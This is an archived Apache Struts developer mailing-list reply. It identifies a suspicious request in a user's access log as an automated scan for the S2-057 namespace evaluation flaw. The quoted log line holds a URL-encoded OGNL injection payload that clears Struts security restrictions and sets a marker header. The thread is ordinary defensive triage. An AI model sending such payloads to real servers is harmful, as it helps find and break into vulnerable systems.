From dev-return-70177-archive-asf-public=cust-asf.ponee.io@struts.apache.org  Sun Jan 20 15:33:51 2019
Return-Path: <dev-return-70177-archive-asf-public=cust-asf.ponee.io@struts.apache.org>
X-Original-To: archive-asf-public@cust-asf.ponee.io
Delivered-To: archive-asf-public@cust-asf.ponee.io
Received: from mail.apache.org (hermes.apache.org [140.211.11.3])
	by mx-eu-01.ponee.io (Postfix) with SMTP id DBF7B180634
	for <archive-asf-public@cust-asf.ponee.io>; Sun, 20 Jan 2019 15:33:50 +0100 (CET)
Received: (qmail 82277 invoked by uid 500); 20 Jan 2019 14:33:49 -0000
Mailing-List: contact dev-help@struts.apache.org; run by ezmlm
Precedence: bulk
List-Unsubscribe: <mailto:dev-unsubscribe@struts.apache.org>
List-Help: <mailto:dev-help@struts.apache.org>
List-Post: <mailto:dev@struts.apache.org>
List-Id: "Struts Developers List" <dev.struts.apache.org>
Reply-To: "Struts Developers List" <dev@struts.apache.org>
Delivered-To: mailing list dev@struts.apache.org
Received: (qmail 82266 invoked by uid 99); 20 Jan 2019 14:33:49 -0000
Received: from mail-relay.apache.org (HELO mailrelay1-lw-us.apache.org) (207.244.88.152)
    by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 20 Jan 2019 14:33:49 +0000
Received: from mail-it1-f178.google.com (mail-it1-f178.google.com [209.85.166.178])
	by mailrelay1-lw-us.apache.org (ASF Mail Server at mailrelay1-lw-us.apache.org) with ESMTPSA id 0433643F7
	for <dev@struts.apache.org>; Sun, 20 Jan 2019 14:33:48 +0000 (UTC)
Received: by mail-it1-f178.google.com with SMTP id g76so13214754itg.2
        for <dev@struts.apache.org>; Sun, 20 Jan 2019 06:33:48 -0800 (PST)
X-Gm-Message-State: AJcUukdY2k5+zHNiE0iajYqzWkHevBfqdjy1QANZ7OiIgo2lR4hAt5MO
	1IkTkKzIOxN+rgJnIh8GPibGp40QbBrzn30Zuhc=
X-Google-Smtp-Source: ALg8bN5nn6Ityt6UpkhfgD5QQcyGQnULTGdRj8km5DdV7Jk5k8v5pyvlmLklweDpx4/8Fa6WfQF1tfnvo0K6zqY4gtc=
X-Received: by 2002:a05:660c:1c4:: with SMTP id s4mr2096240itk.24.1547994828246;
 Sun, 20 Jan 2019 06:33:48 -0800 (PST)
MIME-Version: 1.0
References: <CAJi=3dV-TZbUH4yvxVNO1YHOApf-LhPs-m7b+ce-AZxj2SZUHw@mail.gmail.com>
In-Reply-To: <CAJi=3dV-TZbUH4yvxVNO1YHOApf-LhPs-m7b+ce-AZxj2SZUHw@mail.gmail.com>
From: Lukasz Lenart <lukaszlenart@apache.org>
Date: Sun, 20 Jan 2019 15:33:37 +0100
X-Gmail-Original-Message-ID: <CAMopvkP_i+ytp8+W2vTsDgf7vUSqBAnF_M0XoDT4mSjLu4hABg@mail.gmail.com>
Message-ID: <CAMopvkP_i+ytp8+W2vTsDgf7vUSqBAnF_M0XoDT4mSjLu4hABg@mail.gmail.com>
Subject: Re: Not seen this attempt before?
To: Struts Developers List <dev@struts.apache.org>
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable

niedz., 20 sty 2019 o 13:02 Greg Huber <gregh3269@gmail.com> napisa=C5=82(a=
):
>
> Any ideas?
>
> 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST
> /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberA=
ccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.o=
pensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23contain=
er.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlU=
til.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().cl=
ear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts=
2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%=
27struts2_security_check%27))%7d/index.action
> HTTP/1.1" 500 1497 "-" "Auto Spider 1.0"
> 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST /index.action HTTP/1.=
1"
> 200 2023 "-" "Auto Spider 1.0"

I would say a robot is scanning Internet to find vulnerable sites and
looks like it addresses the latest vulnerability with namespace
evaluation
https://cwiki.apache.org/confluence/display/WW/S2-057


Regards
--=20
=C5=81ukasz
+ 48 606 323 122 http://www.lenart.org.pl/

---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@struts.apache.org
For additional commands, e-mail: dev-help@struts.apache.org